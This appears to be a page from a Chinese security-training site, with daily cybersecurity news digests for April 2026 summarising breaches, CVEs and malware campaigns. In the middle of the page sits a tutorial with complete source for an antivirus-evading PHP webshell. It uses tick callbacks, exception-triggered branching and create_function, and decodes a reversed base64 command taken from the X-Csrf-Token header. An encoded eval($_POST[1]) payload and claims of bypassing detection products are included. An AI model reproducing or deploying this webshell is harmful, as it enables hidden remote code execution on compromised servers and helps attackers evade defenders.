https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-a-critical-litellm-pre-auth-sqli-flaw/ 开源LLM网关LiteLLM存在关键预认证SQL注入漏洞CVE-2026-42208,攻击者通过向API路由发送特制Authorization请求头即可注入恶意SQL语句,窃取代理数据库中存储的API密钥、虚拟密钥、主密钥及各AI提供商凭证。安全人员监测显示该漏洞在公开披露后约36小时即遭到有针对性的活跃利用,攻击者两阶段攻击手法专业且目标明确。LiteLLM已在1.83.7版
6、微软确认Windows Shell漏洞遭积极利用
https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html 微软确认Windows Shell欺骗漏洞CVE-2026-32202已在野外被主动利用。该漏洞源于CVE-2026-21510补丁不完整,攻击者通过恶意LNK文件触发受害者机器自动解析UNC路径并发起SMB连接,在无需用户交互的情况下窃取Net-NTLMv2哈希,用于后续中继攻击。微软已于4月14日发布补丁,4月27日更新公告确认该漏洞已被利用。安全专家建议警惕来源不明的LNK文件,监控异常SMB出站连接。
7、朝鲜黑客通过伪装Excel文件向制药公司投放恶意软件
https://cybersecuritynews.com/north-korean-hackers-attacking-drug-companies/ 朝鲜黑客组织Kimsuky伪装Excel文件攻击药企,窃取敏感数据。恶意.lnk文件含多层载荷,通过计划任务隐蔽执行,连接Dropbox窃取信息。建议启用文件扩展名显示、监控异常进程并隔离受感染系统。
8、攻击者可通过漏洞链在CODESYS应用中植入后门
https://cybersecuritynews.com/attackers-backdoor-codesys-applications/ CODESYS工业控制系统曝高危漏洞,攻击者可组合利用权限配置错误和资源传输缺陷,篡改PLC程序植入后门,获取设备完全控制权,威胁水处理、电网等关键设施。厂商已发布补丁,建议立即更新并加强网络监控。
9、上海隧道新加坡子公司发生数据泄露
https://www.secrss.com/articles/89847 上海隧道新加坡公司发生数据泄露,其承包的地铁站、新生水厂建设项目相关数据泄露,目前尚未发现被公开;地铁站/水厂的主管部门回应称,已暂停该公司对项目相关数字系统的访问权限。
10、cPanel发布安全更新修复了一个关键身份验证漏洞
https://thehackernews.com/2026/04/critical-cpanel-authentication.html cPanel 发布了安全更新,以解决一个影响各种认证路径的安全问题,该问题可能允许攻击者获取控制面板软件的访问权限。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年04月29日
1、亲乌黑客组织PhantomCore入侵俄罗斯服务器
https://thehackernews.com/2026/04/phantomcore-exploits-trueconf.html 研究人员发布报告称,亲乌克兰黑客组织PhantomCore自2025年9月起,利用TrueConf服务器的三个漏洞攻击俄罗斯服务器。该组织通过漏洞链远程执行命令,使用多种专用及公开工具完成入侵、横向移动和窃密,部分入侵部署了PHP Web Shell。尽管TrueConf已于2025年8月发布补丁,但攻击仍在持续,该组织还联合CapFIX等团伙,以网络钓鱼等方式扩大攻击范围。
2、Vidar窃密木马借假验证码隐蔽传播
https://www.pointwild.com/threat-intelligence/inside-vidar-2026-from-infection-to-memory-execution-via-jpeg-and-txt-payloads/ Vidar信息窃取木马出现新版本,其传播方式更加隐蔽。该恶意程序通过伪造验证码页面诱导用户操作,并将载荷隐藏在JPEG图片和TXT文本文件中,以规避传统安全检测。同时,攻击链采用无文件攻击技术,减少在磁盘上留下明显痕迹,从而提升持久化与躲避查杀能力。该木马的主要目标是窃取受害者浏览器中的敏感信息以及加密货币钱包相关数据,显示出针对个人凭据和数字
3、 研究人员发现82款Chrome扩展出售用户数据
https://layerxsecurity.com/blog/your-extensions-sell-your-data-and-its-perfectly-legal/ 研究人员发现82款Chrome扩展程序存在收集并出售用户数据的行为,受影响用户至少达650万。报道指出,这些扩展通过已披露但仍令人担忧的方式处理用户信息,意味着相关数据收集和共享行为可能在一定程度上写入了其说明或隐私条款中,但普通用户未必充分意识到潜在风险。此事再次凸显浏览器扩展在权限申请、数据访问和第三方共享方面的隐私隐患。对于用户而言,即使扩展来自官方商店,也应审慎审查其权限范围、开发者背景及隐私政策,并及时删除不
4、Robinhood账户漏洞被用于发送钓鱼邮件
https://www.bleepingcomputer.com/news/security/robinhood-account-creation-flaw-abused-to-send-phishing-emails/ 在线交易平台Robinhood的账户创建流程漏洞遭不法分子利用,用于发送钓鱼邮件。攻击者通过修改设备元数据注入HTML代码,将钓鱼内容嵌入合法邮件,以“账户可疑登录”为由诱骗用户点击钓鱼链接。邮件来自平台合法邮箱且通过安全校验,极具迷惑性,目前涉事钓鱼网站已关闭。Robinhood已修复漏洞并声明未发生系统入侵,建议用户删除可疑邮件、不点击陌生链接。
5、ShinyHunters泄露多家企业关联数据
https://hackread.com/shinyhunters-leak-udemy-zara-7-eleven-data-breach/ 据报道,黑客组织ShinyHunters泄露了与Udemy、Zara和7-Eleven相关的数据,并声称这些信息涉及Salesforce记录及云端系统。现有披露内容显示,此次事件将多家知名企业与同一批外泄数据联系起来,焦点集中在客户关系管理平台和云环境中的信息暴露风险。报道未进一步说明受影响数据的具体类型、规模、时间范围以及各公司是否确认遭入侵,因此目前能够确认的是该组织已公开相关数据并提出上述关联说法。事件再次引发外界对第三方平台、云服务配置及供应
6、医疗器械巨头美敦力确认发生数据泄露事件
https://www.bleepingcomputer.com/news/security/medtronic-confirms-breach-after-hackers-claim-9-million-records-theft/ 国际医疗器械巨头美敦力证实其网络遭黑客入侵,数据发生泄露。此前,勒索组织ShinyHunters声称入侵该公司,窃取超900万条含个人身份信息的记录及数TB内部企业数据,并以泄露数据相威胁索要赎金。美敦力表示,此次泄露未影响产品、患者安全及业务运营,目前正调查黑客是否获取个人数据,并承诺将及时通知受影响用户并提供支持。
7、OpenClaw 多项漏洞可导致策略绕过与主机劫持
https://www.freebuf.com/articles/ai-security/479025.html 网络安全研究人员近日在 AI Agent 框架 OpenClaw(曾用名 Clawdbot 和 Moltbot)中披露了三个中危漏洞。这些通过 npm 包分发的安全缺陷可导致策略执行绕过、网关配置篡改以及可能引发凭证泄露的主机劫持攻击。开发团队已发布 OpenClaw 2026.4.20 版本修复全部三个漏洞。强烈建议 2026.4.20 之前版本的用户立即升级部署以保护系统环境。
8、GPT-5.5推出生物漏洞赏金计划强化高级AI安全防护
https://cybersecuritynews.com/gpt-5-5-bio-bug-bounty/ OpenAI推出GPT-5.5生物漏洞赏金计划,邀请专家测试通用越狱提示词能否突破生物安全防护,成功者可获奖励,旨在强化AI系统安全并防范生物滥用风险。测试期2026年4-7月,参与者需签署保密协议。
9、间接提示注入攻击正悄然蔓延至真实网络环境
https://www.helpnetsecurity.com/2026/04/24/indirect-prompt-injection-in-the-wild/ 开放网络正被针对AI Agent的间接提示注入(IPI)攻击充斥,攻击者通过隐藏指令操纵AI执行恶意操作,包括数据窃取、金融欺诈等。谷歌和Forcepoint发现攻击激增,恶意IPI增长32%,AI权限越高风险越大,防范窗口正迅速关闭。
10、微软Entra Agent ID权限提升漏洞可导致租户接管
https://hackread.com/microsoft-entra-agent-id-flaw-tenant-takeover/ 微软Entra Agent ID存在权限提升漏洞,攻击者可利用Agent ID Administrator角色接管特权服务主体,完全控制租户网络。该漏洞影响广泛,微软已修复,企业需检查敏感账户变更记录。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年04月28日
1、UNC6692借助Teams投递Snow恶意工具集
https://cloud.google.com/blog/topics/threat-intelligence/unc6692-social-engineering-custom-malware 威胁组织UNC6692通过“邮件轰炸”制造紧迫感,随后冒充IT服务台人员在Microsoft Teams联系受害者,诱导其点击所谓可阻止垃圾邮件的补丁链接。实际投递的是一套名为“Snow”的定制恶意软件,包括Chrome恶意扩展SnowBelt、隧道工具SnowGlaze和基于Python的后门SnowBasin。该工具集可建立持久化、隐藏与C2的通信,并支持远程执行命令、文件下载、截图、数据窃取
2、GlassWorm在Open VSX投放73个克隆扩展程序
https://socket.dev/blog/73-open-vsx-sleeper-extensions-glassworm 研究团队披露了一起针对Open VSX扩展市场的供应链攻击事件。威胁行为体GlassWorm通过新注册的GitHub账户发布了73个克隆扩展程序,这些程序初期伪装成合法工具(如土耳其语语言包),以建立用户信任并积累下载量。截至报告发布时,已有至少6个休眠扩展被激活,通过正常更新渠道传播恶意软件。攻击者采用多种技术逃避检测,此前该组织还曾利用Solana区块链交易备忘录作为"死信箱"传输第二阶段载荷。专家已将相关扩展标记并建立专门追踪页面,提醒开发者警惕名称、图标高
3、PackageKit提权漏洞可致Linux获取root权限
https://www.bleepingcomputer.com/news/security/new-pack2theroot-flaw-gives-hackers-root-linux-access/ Linux软件包管理后台服务PackageKit被披露存在高危本地提权漏洞“Pack2TheRoot”,编号为CVE-2026-41651,CVSS评分8.8。该漏洞存在于PackageKit 1.0.2至1.3.4版本,持续近12年,可能使本地用户在特定条件下无需认证执行安装或删除系统软件包等操作,进而获得root权限。德国电信红队表示,默认预装并启用PackageKit的发行版都应视为可
4、BlackFile团伙被指发起电诈式勒索攻击
https://rhisac.org/threat-intelligence/extortion-in-the-enterprise-defending-against-blackfile-attacks/ 一个名为BlackFile的新型逐利黑客团伙被关联到,针对零售和酒店行业的一波数据窃取与勒索活动。该组织又被跟踪为CL-CRI-1116、UNC6671和Cordial Spider,常冒充企业IT服务台,通过伪造来电号码实施语音钓鱼,诱导员工访问假冒登录页面并输入凭证及一次性验证码。攻击者随后利用窃取的账号注册自有设备以绕过多因素认证,并借助内部员工目录提升到高管账户权限,批量导出含“
5、ADT确认遭入侵并有客户信息被窃取
https://www.bleepingcomputer.com/news/security/adt-confirms-data-breach-after-shinyhunters-leak-threat/ 家居安防企业ADT证实发生数据泄露事件。公司表示于4月20日发现有未授权访问涉及客户及潜在客户数据,随后已终止入侵并展开调查。调查确认,泄露信息主要包括姓名、电话号码和地址;少量情况下还涉及出生日期以及社会安全号码或税号后四位。ADT强调,银行账户、信用卡等支付信息未被访问,客户安防系统也未受到影响。公司称此次事件影响范围有限,并已通知所有受影响个人。
6、美国Itron公司内部IT网络遭未授权入侵
https://www.bleepingcomputer.com/news/security/american-utility-firm-itron-discloses-breach-of-internal-it-network/ 美国公用事业技术公司Itron披露,其部分内部系统近日前后遭未授权第三方访问。公司称在发现异常后已启动网络安全响应计划,向执法部门报案,并引入外部顾问开展调查、缓解、修复与遏制工作。目前相关未授权活动已被阻断,且尚未发现后续活动。Itron表示,此次事件未波及客户环境,业务运营也未出现重大中断,现阶段预计不会产生进一步实质性影响,且相当一部分事件处置成本预计可由保
7、Gemini CLI 高危漏洞可导致远程代码执行攻击
https://www.freebuf.com/articles/ai-security/478925.html 谷歌已修复 Gemini CLI 中的一个高危安全漏洞,该漏洞可能允许攻击者在某些自动化工作流中执行远程代码。该问题影响 npm 软件包 @google/gemini-cli 和 google-github-actions/run-gemini-cli GitHub Action,尤其当它们用于 CI/CD 流水线等无头环境时。
8、Windows版Nessus Agent漏洞可导致SYSTEM权限任意代码执行
https://www.freebuf.com/articles/system/478806.html Tenable公司Windows版Nessus Agent中新披露的安全漏洞可能允许攻击者以最高系统权限执行恶意代码,这令依赖该广泛部署的漏洞评估平台的企业安全团队高度警惕。该漏洞使威胁攻击者能够创建Windows连接点(一种文件系统符号链接),利用该链接可删除具有SYSTEM权限的任意文件。一旦实现该特权级别的文件删除操作,攻击者就能逐步实现完整的任意代码执行场景,最终完全控制受感染主机。
9、微软引入Anthropic的Mythos模型强化安全软件开发
https://www.csoonline.com/article/4162446/microsoft-taps-anthropics-mythos-to-strengthen-secure-software-development.html 微软整合Anthropic的Mythos AI模型强化SDL,标志生成式AI正式介入漏洞检测与防御流程,将改变软件安全开发模式。此举影响远超微软,推动AI从实验转向核心安全应用,但新型漏洞仍需人工介入。【
10、苹果修复iOS漏洞:FBI取证案件中Signal已删除通知仍被留存
https://thehackernews.com/2026/04/apple-patches-ios-flaw-that-stored.html 苹果发布iOS/iPadOS更新修复通知漏洞(CVE-2026-28950),解决标记删除通知仍保留设备的问题,影响多款iPhone/iPad机型。FBI曾利用该漏洞取证Signal消息。建议用户更新系统并调整通知设置以保护隐私。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记录一个免杀的php webshell demo
分支对抗
分支对抗简单来说就是利用了增大程序控制分支的复杂度来使得绕过检测引擎,程序在控制流图上往往有几种结构:
那么我们还有其他的改变程序控制流的思路不?此处我用了两种方法混合在一起实现免杀
异常捕获机制
这里使用的是触发异常来完成程序控制流的第一次分支,所以我自己写了一个除以0触发异常的函数
function safeDivide($a, $b) {
if ($b == 0) {
throw new Exception("Division by zero is not allowed.");
}
return $a / $b;
}
设置一个pass传参,我设置的主体框架如下:
try {
echo "result:".safeDivide(2025, ($_GET['pass']-1));
}catch(Exception $e){
// evil code
}
回调
我在php的官方文档里翻到一个有趣的函数
ticks参数可以设置Zend VM opcode执行条数后触发
我们测试一下:
<?php
declare(ticks=15);
function test(){
echo "this is evil code\n";
}
register_tick_function('test');
for ($i = 1; $i <= 12; $i++) {
echo "shell: $i\n";
}
我们可以发现设置declare(ticks=15) 后,PHP每累计到约15个“tickable”执行点,就调用一次通过register_tick_function注册的函数。
那么对于我们的webshell免杀,我们也可以利用这个函数,来完成程序控制流的改变
此处的设计将declare回调放在最外层实现第一次的控制流变化,将异常触发放在内层实现第二次
动态函数调用
这个就是直接使用php的函数了,没啥好说的了
create_function(string $args, string $code): string
实际测试的时候,如果使用变量接受的话,容易被检测
$a = create_function('', '');
$a();
不使用变量来存匿名函数,这个也是尽量减少污点分析时候的特征
@create_function('','')))();
编码混淆
找个大模型一把梭
base64和逆序
function custom_base64_decode($input) {
$base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$input = rtrim($input, '=');
$binaryString = '';
foreach (str_split($input) as $char) {
$index = strpos($base64Chars, $char);
if ($index === false) {
throw new Exception("Invalid Base64 character: $char");
}
$binaryString .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT);
}
$bytes = str_split($binaryString, 8);
$decodedString = '';
foreach ($bytes as $byte) {
$decodedString .= chr(bindec($byte));
}
return $decodedString;
}
function reverseString($input)
{
if (!is_string($input)) {
return "need str";
}
$length = strlen($input);
$reversed = "";
for ($i = $length - 1; $i >= 0; $i--) {
$reversed .= $input[ $i ];
}
return $reversed;
}
完整的webshell
源代码
具体的攻击载荷放在http的X-Csrf-Token里
<?php
session_start();
declare(ticks=15);
function safeDivide($a, $b) {
if ($b == 0) {
throw new Exception("Division by zero is not allowed.");
}
return $a / $b;
}
function custom_base64_decode($input) {
$base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$input = rtrim($input, '=');
$binaryString = '';
foreach (str_split($input) as $char) {
$index = strpos($base64Chars, $char);
if ($index === false) {
throw new Exception("Invalid Base64 character: $char");
}
$binaryString .= str_pad(decbin($index), 6, '0', STR_PAD_LEFT);
}
$bytes = str_split($binaryString, 8);
$decodedString = '';
foreach ($bytes as $byte) {
$decodedString .= chr(bindec($byte));
}
return $decodedString;
}
function reverseString($input)
{
if (!is_string($input)) {
return "need str";
}
$length = strlen($input);
$reversed = "";
for ($i = $length - 1; $i >= 0; $i--) {
$reversed .= $input[ $i ];
}
return $reversed;
}
function tickHandler(){
try {
echo "result:".safeDivide(2025, ($_GET['pass']-1));
}catch(Exception $e){
@create_function('',custom_base64_decode(reverseString(apache_request_headers()['X-Csrf-Token'])))();
}
}
register_tick_function('tickHandler');
for ($i = 1; $i <= 12; $i++) {
echo "shell: $i\n";
}
测试环境
PHP版本:PHP7全版本
OS:Windows和Linux环境均测试通过
使用方法
初始payload: eval($_POST[1]);
base64编码,逆序处理:==wOp0VMbR1UPB1XkgCbhZXZ
放在http头部里
webshell连接
免杀效果展示
第四届伏魔挑战赛成功绕过(white)的截图
VT
D盾(2.1.8.6)
河马:报了可疑
网络安全日报 2026年04月27日
1、APT组织Harvester部署后门开展间谍活动
https://www.security.com/threat-intelligence/harvester-new-linux-backdoor-gogra 研究人员发现疑似国家支持的Harvester APT组织开发了一种新型Linux后门GoGra,利用Microsoft Graph API和Outlook邮箱作为隐蔽C2通道。该组织至少自2021年起活跃,此前主要使用Windows间谍工具,此次扩展至跨平台能力表明其工具集持续进化。数据显示印度和阿富汗为主要目标区域,与Harvester历史上针对南亚的间谍活动一致。安全团队建议相关地区组织加强邮件过滤与终端检测。
2、开源密码管理器Bitwarden CLI遭供应链攻击
https://socket.dev/blog/bitwarden-cli-compromised 开源密码管理器Bitwarden的CLI工具遭到入侵,系Checkmarx持续供应链攻击活动的一部分。攻击者利用Bitwarden CI/CD流水线中被入侵的GitHub Action,在bw1.js文件中植入恶意载荷,通过相同C2端点窃取GitHub令牌、AWS/Azure/GCP云凭证及SSH密钥等敏感信息,并利用Dune主题命名规则创建公共仓库进行数据外泄。安全团队建议受影响用户立即移除恶意包、轮换全部凭证并审查CI日志。
3、Breeze Cache插件文件上传漏洞遭黑客利用
https://www.bleepingcomputer.com/news/security/hackers-exploit-file-upload-bug-in-breeze-cache-wordpress-plugin/ 安全公司披露,WordPress Breeze Cache缓存插件存在严重漏洞CVE-2026-3844,已被黑客积极利用。该插件拥有超40万活跃安装,由Cloudways开发。漏洞源于"fetch_gravatar_from_remote"函数缺少文件类型验证,未经身份验证的攻击者可上传任意文件,导致远程代码执行及网站完全接管,CVSS评分高达9.8分。受影响版本为2
4、黑客入侵Checkmarx KICS分析工具并窃取数据
https://checkmarx.com/blog/checkmarx-security-update-april-22/ Checkmarx KICS基础设施即代码分析工具遭到供应链攻击。攻击者入侵了官方Docker镜像及VS Code、Open VSX扩展,植入名为"mcpAddon.js"的恶意MCP插件组件,窃取GitHub令牌、云凭证、npm令牌、SSH密钥及Claude配置等敏感数据。TeamPCP黑客曾宣称对此负责,但研究人员表示归因证据不足。Checkmarx已发布安全公告,确认恶意程序已删除、泄露凭证已轮换,并在外部专家协助下展开调查。
5、社交媒体平台Mastodon遭DDoS攻击
https://www.securityweek.com/after-bluesky-mastodon-targeted-in-ddos-attack/ 继Bluesky之后,去中心化社交媒体平台Mastodon也遭遇大规模分布式拒绝服务攻击。攻击针对Mastodon旗舰服务器Mastodon.social,造成平台分类为"重大中断"的故障。根据Mastodon状态页面,DDoS攻击于4月20日下午1点左右开始,下午4点左右缓解措施部署完成,网站恢复访问。Mastodon和Bluesky在Elon Musk收购X(原Twitter)后人气激增,定位为去中心化的替代平台。
6、ClickFix新变种利用Windows工具规避安全检测
https://hackread.com/clickfix-variant-native-windows-tools-bypass-security/ 研究团队发现ClickFix社会工程攻击出现新变种,攻击者突破传统PowerShell和Rundll32依赖,转而滥用cmdkey和regsvr32等Windows原生实用程序实现多阶段隐蔽攻击。该变种通过伪造验证码页面诱骗用户在运行对话框执行恶意命令,利用cmdkey存储远程访问凭据后,通过regsvr32从UNC路径加载并执行远程DLL,实现凭证暂存、载荷检索与静默执行的完整攻击链。专家建议监控出站SMB/UNC访问,限制cmdkey外部
7、LMDeploy SSRF漏洞披露13小时后遭在野利用
https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html 研究人员发现LMDeploy(开源LLM部署工具包)的高危SSSRF漏洞CVE-2026-33626在公开披露后12小时31分钟内即遭在野利用。漏洞CVSS评分7.5,存在于LMDeploy视觉语言模块的load_image()函数,该函数获取任意URL时未验证内部/私有IP地址,允许攻击者访问云元数据服务、内部网络和敏感资源,可窃取云凭据、端口扫描内网、横向移动。漏洞影响0.12.0及此前所有启用视觉语言支持的版本。
8、研究人员发现多款FakeWallet恶意苹果应用
https://thehackernews.com/2026/04/26-fakewallet-apps-found-on-apple-app.html 研究员发现苹果App Store中存在26款名为FakeWallet的恶意应用,冒充Bitpie、Coinbase、imToken、TokenPocket和Trust Wallet等主流加密钱包,自2025年秋季起窃取恢复短语和私钥。应用启动后将用户重定向至仿冒App Store的浏览器页面分发木马化正版钱包。应用图标与原始一致但名称含故意拼写错误(如LeddgerNew),部分应用名称和图标与加密货币无关,作为占位符引导用户通过企业配置文
9、法国警方逮捕涉大规模数据盗窃黑客HexDex
https://hackread.com/french-police-arrest-hexdex-hacker-data-leak-leaks/ 法国警方在旺代地区逮捕20岁男性黑客HexDex,其被控从数十个网站窃取私人信息并在BreachForums和DarkForums上泄露。调查始于2025年12月底,收到近100起数据盗窃报案。HexDex涉嫌攻击约15个法国体育联合会,以及法国教育部、枪支持有者国家数据库SIA、国家警察培训平台e-campus、摩泽尔省警察局、国家领土凝聚力署ANCT、公共服务招聘门户和巴黎爱乐音乐厅等。网络犯罪旅BL2C查扣其计算机设备并控制其DarkForu
10、研究人员发现名为Fast16的破坏性恶意软件
https://www.securityweek.com/pre-stuxnet-sabotage-malware-fast16-linked-to-us-iran-cyber-tensions/ 研究人员发现一款名为Fast16的Lua破坏性恶意软件,其创建时间早于Stuxnet,旨在篡改高精度计算软件结果。该软件曾出现在ShadowBrokers泄露的NSA攻击工具中,并于2005年被用于攻击。安全公司认为Fast16可能由美国开发。Fast16的补丁模式旨在对土木工程及物理过程模拟软件进行战略性破坏,通过在计算中引入微小但系统性的误差,长期降低工程系统性能甚至造成灾难性后果。蠕虫组件可
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年04月24日
1、npm供应链蠕虫窃取开发人员凭据并自我传播
https://www.stepsecurity.io/blog/pgserve-compromised-on-npm-malicious-versions-harvest-credentials 研究人员发现针对npm生态系统的供应链攻击,恶意代码可自我传播至被攻陷账户发布的所有包。攻击源自Namastex Labs的16个包,这些包用于AI代理工具和数据库操作。若在环境变量或~/.npmrc中找到发布令牌,恶意脚本会识别受害者可发布的包、注入载荷并以递增版本号重新发布到npm,实现递归传播。若发现PyPI凭据,还会使用.pth载荷对Python包实施类似攻击,构成跨生态系统威胁,研究人员
2、新型勒索软件Kyber攻击Windows和ESXi
https://www.rapid7.com/blog/post/tr-kyber-ransomware-double-trouble-windows-esxi-attacks-explained/ 研究人员发现新型Kyber勒索软件,同时针对Windows文件服务器和VMware ESXi环境部署两个不同变体。两个变体共享相同活动ID和基于Tor的勒索基础设施,由同一附属机构部署以最大化影响。ESXi变体专门针对VMware环境,具备数据存储加密、可选虚拟机终止和管理界面污损功能;Windows变体用Rust编写,包含针对Hyper-V的"实验性"功能。目前仅一家美国国防承包商和IT服务提
3、社交平台Bluesky遭伊朗313 Team网络攻击
https://hackread.com/bluesky-online-ddos-attack-iran-313-team/ 社交媒体平台Bluesky(Twitter/X替代品,拥有4370万用户)于2026年4月15日晚11:40 PDT起遭受分布式拒绝服务攻击,导致信息流无法刷新、通知不显示、搜索功能瘫痪、用户无法打开帖子,持续约24小时。攻击者向API发送大量垃圾流量堵塞系统通信线路。与伊朗有关联的黑客组织313 Team(又称伊拉克伊斯兰网络抵抗力量)在Telegram上宣称对攻击负责,并发布了被攻击网站的截图炫耀战绩。
4、黑客利用D-Link漏洞部署Mirai僵尸网络新变种
https://www.akamai.com/blog/security-research/cve-2025-29635-mirai-campaign-targets-d-link-devices 研究人员发现新型Mirai僵尸网络活动,主动利用D-Link DIR-823X路由器高危命令注入漏洞CVE-2025-29635招募设备。这是该漏洞首次观察到在野主动利用。攻击者向/goform/set_prohibiting端点发送POST请求触发远程命令执行,下载并执行shell脚本dlink.sh,安装名为tuxnokill的多架构Mirai变种。受影响设备已于2024年11月结束生命周期(
5、Cohere AI Terrarium沙箱漏洞可实现容器逃逸
https://thehackernews.com/2026/04/cohere-ai-terrarium-sandbox-flaw.html 安全机构披露Cohere AI开源Python沙箱项目Terrarium存在严重沙箱逃逸漏洞CVE-2026-5752,CVSS评分9.3。漏洞根源在于Pyodide WebAssembly环境中的JavaScript原型链遍历,允许沙箱代码引用和操纵宿主环境中的对象,从而以root权限在容器内执行任意系统命令。攻击者可突破沙箱边界访问/etc/passwd等敏感文件、访问容器网络上的其他服务,甚至可能逃逸容器并进一步提权。
6、Apple修复iOS通知服务数据残留漏洞
https://support.apple.com/en-us/127002 Apple发布iOS和iPadOS带外安全更新,修复通知服务漏洞,该漏洞可能导致标记为删除的通知数据仍保留在设备上。受影响系统包括iPhone XS及后续机型、iPad Pro 12.9英寸第3代及后续机型、iPad Pro 11英寸所有机型、iPad Air第3代及后续机型、iPad第7代及后续机型、iPad mini第5代及后续机型。Apple表示已知晓该问题可能已被利用,但未披露具体利用场景或攻击细节。该漏洞影响通知服务的隐私保护机制,用户删除的通知内容可能仍存储在本地设备上而非被彻底清除
7、Claude Mythos 发现 271 个 Firefox 漏洞
https://www.helpnetsecurity.com/2026/04/22/claude-mythos-mozilla-vulnerabilities-scanning/ Mozilla测试AI模型Claude Mythos发现Firefox 271个漏洞,远超人工发现的22个,显示AI在网络安全领域的突破。Mozilla认为AI将大幅提升漏洞检测效率,使漏洞利用成本极高,但完全消除不现实。Anthropic限制模型访问以防滥用,但已出现未授权访问尝试。
8、黑客利用篡改版安卓NFC应用窃取非接触式支付数据
https://www.csoonline.com/article/4161983/nfc-tap-to-pay-gets-tapped-by-hackers.html 黑客利用木马化安卓支付应用HandyPay窃取NFC数据和PIN码,克隆支付卡盗刷账户。NGate恶意软件新变种植入该应用,通过虚假网站传播,疑似借助AI开发。用户需警惕非官方渠道安装应用。
9、谷歌推出全新安全运维Agent、Wiz集成方案及Agent治理工具
https://siliconangle.com/2026/04/22/google-cloud-next-new-security-operations-agents-wiz-integrations-agent-governance-tools/ 谷歌发布多项安全更新,包括三款AI安全运维Agent、Wiz防护扩展至多平台,以及Agent身份治理工具,应对AI时代威胁响应时间骤降的挑战,提升云安全防护能力。
10、黑客利用Outlook邮箱隐藏Linux版GoGra后门通信
https://www.freebuf.com/articles/system/478480.html 一个疑似国家背景的黑客组织开发出利用微软Outlook邮箱隐藏恶意活动的新技术,使常规安全工具难以检测其攻击行为。自2021年起活跃的Harvester APT组织(被认定具有国家背景)近期升级了其GoGra后门程序,推出Linux版本。该恶意软件通过合法的Microsoft Graph API和真实Outlook邮箱建立隐蔽命令控制(C2)通道,借助受信任的微软云基础设施绕过传统边界防御——这些防御机制通常不会将正常邮件流量标记为可疑。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

